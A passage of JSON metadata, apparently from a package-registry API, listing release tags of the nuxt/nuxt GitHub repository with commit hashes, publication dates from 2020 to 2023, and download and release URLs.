https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee